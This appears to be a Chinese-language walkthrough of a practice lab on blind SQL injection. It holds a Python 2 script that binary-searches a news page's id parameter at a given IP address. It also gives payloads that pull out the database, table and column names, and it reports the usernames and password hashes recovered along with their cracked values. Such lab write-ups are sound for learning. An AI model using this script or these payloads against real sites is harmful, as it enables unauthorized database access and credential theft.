两种方法
一种是用穿山甲跑,直接得到用户名密码。
一种是使用python脚本跑,使用sqlmap也行,下面是我自己写的脚本
跑库名 (二分法查找)得到stormgroup
import string
import requests
url = "http://219.153.49.228:47151/new_list.php?id=1%s"
payload = " and ascii(substr(database(),%s,1))>%s"
value = ''
str1 = string.digits+string.letters
print "............start............"
for i in range(1,33):
max = 122
min = 46
flag=0
while abs(max-min)>1:
mid = (max+min)/2
p = payload % (str(i),str(mid))
response = requests.get(url % p)
if response.content.find("12:00")!=-1:
min=mid
flag=1
else:
max=mid
if(flag):
value=value+chr(max)
else:
break
print value
print "the value is :%s" % value
print "...............end............"
跑表名(改变payload的值)得到member(limit 0,1),notice(limit 1,1)
payload = " and ascii(substr((select table_name from information_schema.tables where table_schema='stormgroup' limit 0,1),%s,1))>%s"
跑列名(member) 得到name(limit 0,1),password(1,1),status(limit 2,1)
payload = " and ascii(substr((select column_name from information_schema.columns where table_schema='stormgroup' and table_name='member' limit 0,1),%s,1))>%s"
跑内容,得到mozhe/3114b433dece9180717f2b7de56b28a3(528469)status(0)所以无用
mozhe/e1c6d6b140663b2d56aebcff926e0252(107993)status(1)输入得到key值
payload = " and ascii(substr((select password from member limit 0,1),%s,1))>%s"